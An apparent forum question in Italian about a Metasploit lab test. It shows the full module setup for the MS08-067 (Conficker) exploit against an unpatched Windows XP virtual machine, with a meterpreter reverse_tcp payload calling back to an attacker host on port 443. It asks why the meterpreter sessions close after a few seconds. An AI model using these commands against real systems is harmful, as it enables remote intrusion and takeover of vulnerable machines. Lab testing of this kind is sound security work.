Ho un SP0 / un Windows XP non aggiornato che è vulnerabile al worm Conficker. Sto usando metasploit per usare l'exploit Conficker con lo scopo di aprire una shell remota / riga di comando.
Il mio script Metasploit è il seguente:
use exploit/windows/smb/ms08_067_netapi
set RHOST <vulnerable_win_xp_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacking_kali_host_ip>
set LPORT <local_port>
exploit -j -z
Nel mio caso, ho macchine con indirizzo in 192.168.239.*
e LPORT = 443
.
In questo modo, dovrei essere in grado di aprire una sessione con la macchina vulnerabile remota ( sessions -i 1
), eseguendo quindi l'applicazione della riga di comando ( execute -i -f cmd.exe
) e ottenendo una linea di comando remota.
Tuttavia, quando eseguo la sceneggiatura, sebbene induca Meterpreter ad aprire una sessione con la vittima, questa sessione è chiusa (Motivo: muore) dopo pochi secondi.
Ho trovato che potrebbe essere correlato al fatto che sto usando due macchine virtuali VMWare durante il mio test .
Come suggerito, ho provato con set InitialAutoRunScript migrate -f
, ma non cambia nulla.
Come posso evitare che le sessioni di Meterpreter siano chiuse?
E, soprattutto, perché sono chiusi?